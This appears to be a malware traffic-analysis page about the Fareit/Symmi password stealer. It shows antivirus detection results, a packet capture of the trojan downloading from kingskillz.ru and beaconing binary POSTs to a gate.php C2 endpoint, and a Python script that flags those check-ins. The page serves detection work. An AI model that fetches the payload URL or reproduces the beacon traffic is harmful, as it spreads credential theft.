Fareit/Symmi Shit.exe Trojan Password Stealer Malware PCAP file download Traffic Analysis Sample

SHA256: 54c8ce7531f1b01dcda678c41fb14ffc5f223ff0427fc83de939d2286ad200f0
File name: shit.exe
Detection ratio: 39 / 56
Analysis date: 2016-10-31 02:32:28 UTC
Antivirus                Result                             Update
AVG                      Crypt6.HNN                         20161031
AVware                   Trojan.Win32.Generic!BT            20161031
Ad-Aware                 Gen:Variant.Symmi.68665            20161031
AhnLab-V3                Trojan/Win32.Fareit.N2141190184    20161030
Antiy-AVL                Trojan[PSW]/Win32.Fareit           20161031
Arcabit                  Trojan.Symmi.D10C39                20161031
Avast                    Win32:Malware-gen                  20161031
Avira (no cloud)         TR/Agent.egpwh                     20161030
BitDefender              Gen:Variant.Symmi.68665            20161031
CAT-QuickHeal            (Suspicious) - DNAScan             20161029
ClamAV                   Win.Trojan.Generic-3223            20161031
CrowdStrike Falcon (ML)  malicious_confidence_82% (W)       20161024
DrWeb                    Trojan.PWS.Stealer.1932            20161031
ESET-NOD32               a variant of Win32/Kryptik.FIKV    20161030
Emsisoft                 Gen:Variant.Symmi.68665 (B)        20161031
F-Secure                 Gen:Variant.Symmi.68665            20161031
Fortinet                 W32/Fareit.CEIG!tr.pws             20161031
GData                    Gen:Variant.Symmi.68665            20161031
Ikarus                   Trojan.Win32.Crypt                 20161030
Invincea                 virtool.win32.obfuscator.xy        20161018

2016-10-30 22:38:24.577664 IP 192.168.1.102.61884 > 85.143.222.24.80: Flags [P.], seq 0:315, ack 1, win 256, length 315: HTTP: GET /~kingskil/Prince/Man/lucy/mine/shit.exe HTTP/1.1
E..c..@........fU......P.j...XX.P...._..GET /~kingskil/Prince/Man/lucy/mine/shit.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: kingskillz.ru
Connection: Keep-Alive

2016-10-30 22:38:24.754088 IP 192.168.1.102.61884 > 85.143.222.24.80: Flags [.], ack 2908, win 256, length 0
E..(..@....4...fU......P.j...Xd1P...y.........

E..(..@....(...fU......P:...../.P.............
2016-10-30 22:38:46.639495 IP 192.168.1.102.61887 > 85.143.222.24.80: Flags [P.], seq 0:294, ack 1, win 256, length 294: HTTP: POST /%7Ekingskil/Prince/Man/lucy/mine/gate.php HTTP/1.0
E..N..@........fU......P:...../.P....s..POST /%7Ekingskil/Prince/Man/lucy/mine/gate.php HTTP/1.0
Host: kingskillz.ru
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 340
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)


E..(..@...."...fU......P....i...P...w=........
2016-10-30 22:38:54.708909 IP 192.168.1.102.61888 > 85.143.222.24.80: Flags [P.], seq 0:294, ack 1, win 256, length 294: HTTP: POST /%7Ekingskil/Prince/Man/lucy/mine/gate.php HTTP/1.0
E..N..@........fU......P....i...P...[...POST /%7Ekingskil/Prince/Man/lucy/mine/gate.php HTTP/1.0
Host: kingskillz.ru
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 340
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)


E..(..@........fU......P..n;....P.............
2016-10-30 22:39:02.332735 IP 192.168.1.102.61889 > 85.143.222.24.80: Flags [P.], seq 0:294, ack 1, win 256, length 294: HTTP: POST /%7Ekingskil/Prince/Man/lucy/mine/gate.php HTTP/1.0
E..N..@........fU......P..n;....P....s..POST /%7Ekingskil/Prince/Man/lucy/mine/gate.php HTTP/1.0
Host: kingskillz.ru
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 340
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
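The capture above has two stages worth keying on: the download of shit.exe from /~kingskil/Prince/Man/lucy/mine/ with a browser-looking MSIE 8.0 User-Agent, then three POSTs of exactly 340 bytes to gate.php in the same directory, each HTTP/1.0 with Connection: close, Content-Type: application/octet-stream, Content-Encoding: binary and a User-Agent claiming MSIE 5.0 on Windows 98. Note that the GET writes the tilde as "~" while the POSTs write it as "%7E", so any path match has to percent-decode first. The script below is an added example, not code from the original post: it parses the tcpdump -A text (a constructed excerpt of the capture above is embedded as CAPTURE), normalises the paths, flags each request on those header traits, and reports the gap between check-ins and whether payload and gate share a directory. The indicator names and the four-trait threshold are this example's own choices, not anything taken from the sample.

```python
"""Triage helper for the tcpdump -A text above: extract each HTTP request,
normalise its URL and flag the Fareit-style gate.php check-ins.
Added example for this page, not code from the original post. CAPTURE is a
constructed excerpt of the capture above; the parser skips the byte-dump lines."""
import re
from datetime import datetime
from urllib.parse import unquote

CAPTURE = """\
2016-10-30 22:38:24.577664 IP 192.168.1.102.61884 > 85.143.222.24.80: Flags [P.], seq 0:315, ack 1, win 256, length 315: HTTP: GET /~kingskil/Prince/Man/lucy/mine/shit.exe HTTP/1.1
E..c..@........fU......P.j...XX.P...._..GET /~kingskil/Prince/Man/lucy/mine/shit.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: kingskillz.ru
Connection: Keep-Alive

"""
CHECKIN_HEADERS = """\
Host: kingskillz.ru
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 340
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
"""
# The three check-ins in the capture differ only in timestamp and client port.
for _ts, _port in [("22:38:46.639495", 61887), ("22:38:54.708909", 61888),
                   ("22:39:02.332735", 61889)]:
    CAPTURE += (f"2016-10-30 {_ts} IP 192.168.1.102.{_port} > 85.143.222.24.80: "
                "Flags [P.], seq 0:294, ack 1, win 256, length 294: HTTP: "
                "POST /%7Ekingskil/Prince/Man/lucy/mine/gate.php HTTP/1.0\n"
                + CHECKIN_HEADERS + "\n")

PKT_RE = re.compile(  # tcpdump packet line that carries an HTTP request line
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+) IP "
    r"(?P<src>[\d.]+)\.(?P<sport>\d+) > (?P<dst>[\d.]+)\.(?P<dport>\d+): "
    r".*: HTTP: (?P<method>[A-Z]+) (?P<path>\S+) (?P<ver>HTTP/\d\.\d)$")
HDR_RE = re.compile(r"^([A-Za-z-]+): (.*)$")
CHECKIN_UA = "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"  # sent on every gate.php POST

def parse_requests(text):
    """One dict per HTTP request: timestamp, endpoints, request line, headers."""
    reqs, cur = [], None
    for line in text.splitlines():
        m = PKT_RE.match(line)
        if m:
            cur = dict(m.groupdict(), headers={})
            cur["ts"] = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            reqs.append(cur)
        elif cur is not None and not line.strip():
            cur = None  # blank line closes the header block
        elif cur is not None and (h := HDR_RE.match(line)):
            cur["headers"][h.group(1).lower()] = h.group(2).strip()
    return reqs  # byte dumps and the echoed request line never match and are skipped

def checkin_indicators(req):
    """Names of the gate.php check-in traits a request shows, in a fixed order."""
    h, hits = req["headers"], []
    path = unquote(req["path"])  # /%7Ekingskil/... -> /~kingskil/...
    if req["method"] == "POST" and path.rsplit("/", 1)[-1] == "gate.php":
        hits.append("post_to_gate_php")
    if req["ver"] == "HTTP/1.0":
        hits.append("http_1_0")
    if h.get("user-agent") == CHECKIN_UA:
        hits.append("fixed_ie5_win98_ua")
    if (h.get("content-type") == "application/octet-stream"
            and h.get("content-encoding") == "binary"):
        hits.append("binary_octet_stream_body")
    if h.get("connection", "").lower() == "close":
        hits.append("connection_close")
    return hits

def classify(req):
    """Four or more check-in traits together mark the C2 beacon (threshold is this example's choice)."""
    if len(checkin_indicators(req)) >= 4:
        return "c2-checkin"
    if req["method"] == "GET" and unquote(req["path"]).lower().endswith(".exe"):
        return "payload-download"
    return "other"

def checkin_intervals(reqs):
    """Seconds between consecutive check-ins (beacon period estimate)."""
    ts = [r["ts"] for r in reqs if classify(r) == "c2-checkin"]
    return [round((b - a).total_seconds(), 2) for a, b in zip(ts, ts[1:])]

def shared_directory(reqs):
    """True when the payload GET and the gate POSTs all hit one web directory."""
    return len({unquote(r["path"]).rsplit("/", 1)[0] for r in reqs}) == 1

if __name__ == "__main__":
    rs = parse_requests(CAPTURE)
    for r in rs:
        print(r["ts"].time(), r["sport"], r["method"], classify(r), checkin_indicators(r))
    print("intervals:", checkin_intervals(rs), "same dir:", shared_directory(rs))
```

Run it as-is to get the timeline for the embedded excerpt; on a real pcap, replace CAPTURE with the output of `tcpdump -tttt -nn -A -r capture.pcap 'tcp port 80'`, which produces the same line layout as the dump above. The percent-decoding is the detail that matters most in practice: a rule matching the literal string "/~kingskil/" would see the download but miss all three gate.php POSTs.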